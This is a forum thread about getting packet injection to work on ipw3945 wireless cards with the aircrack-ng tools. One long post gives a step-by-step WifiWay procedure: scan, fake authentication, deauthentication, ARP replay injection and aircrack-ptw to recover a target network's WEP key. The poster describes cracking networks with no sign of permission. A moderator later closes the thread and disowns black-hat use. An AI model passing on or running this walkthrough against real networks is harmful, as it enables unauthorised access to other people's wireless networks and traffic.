Injection
ok...I resolved the first issue ....here's a new one
airodump is working PERFECT (im using ipw3945) airreplay just doesn't inject packets...I get no errors....and I did try to do an ARP attack and it did show ARP requests...so I think it is working to that extent....but as soon as it starts sending....(its sending thousands of packets) yet I am recieving no more IV's I am using backtrack... I believe I am using the right commands....I am using the same commands as I was instructed to on the tutorials....(believe me I have googled alot lol) |
I could be wrong about this, but last time I had heard, the ipw* devices were not yet capable of stable packet injection.
Doing a quick Google, I found some posts as recent as Nov 16th on the Kismet forums that say the ipw3945 is just not capable of packet injection. Have you seen elsewhere that injection should be working on your device? |
Same
I haven't been able to run send packets with my ipw3945 either. I'm using kismet to get info, airodump to capture, aireplay to deauth, and aireplay to replay/resend packets. aireplay would read like 10000 and wouldn't can't even find a sing ARP. Maybe I'm doing something wrong? MS3FGX, what commands are you using?
|
hello,
i have the same problems...seems like there is no solution to make injection working on IPW3945!!! or?? if anyone knows, please post! here my commands, using backtrack beta2 on a HP notebook (centrino, of course) monitor mode: airmon-ng start eth1 4 airodump: airodump-ng --ivs -w dump --channel 4 eth1 injection: (not working :( ) aireplay-ng -3 -b MACofAP -h MACofHOST -x 512 eth1 aireplay-ng -0 10 -a MACofAP -c MACofHOST eth1 airodump works fine, injection doesn't work. there is a patch for IPW2200 cards, but i don't saw something for IPW3945. greets, 23. |
Alright Folks,
Happy to say that I have been able to perform injection on ipw3945 cards using WifiWay. I tried BackTrack to no avail. It would seem that since they have a special "Load IPW3945" option they would have solved this problem. Turns out its a big fat "No" (I love the software though). So after a lot of digging around, it was apparent that the ipw3945 driver on BackTrack wasn't patched for injection (refer to Aircrack website for notes on how almost every driver needs to be patched for injection--they have no patch for ipw3945 as of now). Backtrack has lots of other drivers that are patched for injection (check this website for listings of card compatibility and patched drivers--http://backtrack.offensive-security.com/index.php?title=HCL:Wireless). Now the only thing on the internet (yes and I can say this with confidence cause I have SCOURED the internet) that claims to have a ready-to-rumble patched ip3945 driver is WifiWay. Good News first...it works ! Bad News..good support is difficult to find since everything is written in poor english (nothing personal guys :-) , i love the distro ). So I am writing this for all the rest of us ignorant non-spanish speaking Americans (aside-- if you need more tech info and come across a site in spanish, try google's page translator, it converts it from spanish to somewhat readable english). The first thing you will notice is that WifiWay is not as fancy as BackTrack in that it doesn't have all the bells and whistles but it gets the job done for ipw3945 cards. Also WifiWay is slightly different in the way it gets the job done. They use two different devices (virtual or otherwise), rtap0 for monitoring and wifi0 for injection. Also for those of you rebels (and I did this too) who don't like to follow directions, if you do a iwconfig or ifconfig on a system that has been cold booted, it might seem like the card is not being recognized as iwconfig shows up with rtap0 and wifi0 and others with no wireless extensions and ifconfig is equally stoic. Also wlanconfig stuff doesn't work and only comes up with operation not supported messages. But its ok, forget all that stuff for now. So follow these directions closely if not exactly and you will soon find yourself in Wifiland. I am assuming you have used a bootable copy of WifiWay. Cooking Directions First do this 1. airodump-ng rtap0 This step will help you find all the relevant info by exposing the networks around you. Kismet didn't work for me and I never really found Kismet to be of much use to me (I hear a lot of WHAT!'s..come on guys we are using airodump and the networks that matter are the only ones that it can see, doesn't matter if Kismet reports a thousand other networks. All the info you need for cracking can be obtained from airodump). If you already know the info of your targets (those of you who have unsuccessfully used BackTrack will have this) you can skip the first step 2. ifconfig wifi0 down -- brings the wifi0 device down for resetting 3. Click the Filesystem icon on desktop and get into /sys/class/net/wifi0/device and click on the rate file. Change it from 108 to 2. Remember to save changes (Ctrl+s) 4. Click on the channel file. Change it to whatever channel you want to be on (AP channel-- say from 1 to 11). Save changes. 5. Click on the bssid file. Change it to the bssid of the AP.Save changes. 6. ifconfig wifi0 up --brings wifi0 up again 7. airodump-ng -w file rtap0 -- you can use other filters for --bssid, --ivs etc starts collecting data in file-0x.cap file where "x" is a number automatically assigned by airodump. 8. aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0 if this doesn't work (check this site for how success looks http://aircrack-ng.org/doku.php?id=f...ee175e572097e3) you can do this aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h STATION wifi0. If you see an associated client and would like to use a deauth attack instead you need to do aireplay-ng -0 5 -a BSSID -c STATION instead. Check Aireplay site for details, it has all the kinds of attacks available. Ah..before I forget, if you want to confirm injection capability of your ipw3945 card (technically you don't need to, I am telling you it works :-) ) or make sure the target is not quirky in any sense, you cannot use the -9 or --test attack in the aircrack version used by WifiWay maybe because its an older version of aircrack.Please let me know if you could get it to do the --test attack. 9. aireplay-ng -3 -b BSSID -h STATION wifi0 you should see the data packets (IV's) number rise in airdump. After collection sufficient data packets (IV's) do 10. do ls and you should see all the file-0x.cap files 11. aircrack-ptw file-01.cap --- Aircrack will expose the WEP Key. --> ESSID is the name of the network "John", "Cindy's Network" etc, BSSID is the MAC of the AP, STATION is the MAC of your wireless card. Thats it. What I realized is that using WifiWay and ipw3945 is the easiest way to do this. My Dell with a Atheros card using madwifi-ng driver gave me much more trouble (btw you need to do wlanconfig to use madwifi-ng cause it creates Virtual AP's that use the same card and you can find stuff about it on the internet). One problem I have faced (and this has nothing to do with WifiWay) is that for some networks after step 9, the read ARP count keeps rising up but the sent and got ARP packets number doesn't. They're stuck at zero ? I think this has to do with the network signal strength since all the networks I have been able to crack had high signal strength. I don't think its a MAC filter on the AP cause all these networks have open authentication and I can associate with them just fine (step 8). Would appreciate any suggestions. Sorry about the noob'ishness. I know it would be awesome to actually compile this stuff in Linux and not use WifiWay (this is important not only to achieve independence but also power, since right now I am dependent on the version of Aircrack WifiWay incorporates in its software and of course can't mod it) but I am too busy and too new to Linux to do this. I would absolutely appreciate any suggestions and directions. p.s. Respect your Freedom |
Quote:
|
yeah, as detailed above, we don't condone or encourage any black hat activity. looking at your post, it seems you're more boasting baout what you did rather than trying to provide help, which is also not somethign LQ really likes... thirdly, this thread is old and dead, please don't drag up old ones. for simplicity i'm closing this thread now, but will leave as is.
|
All times are GMT -5. The time now is 09:38 PM. |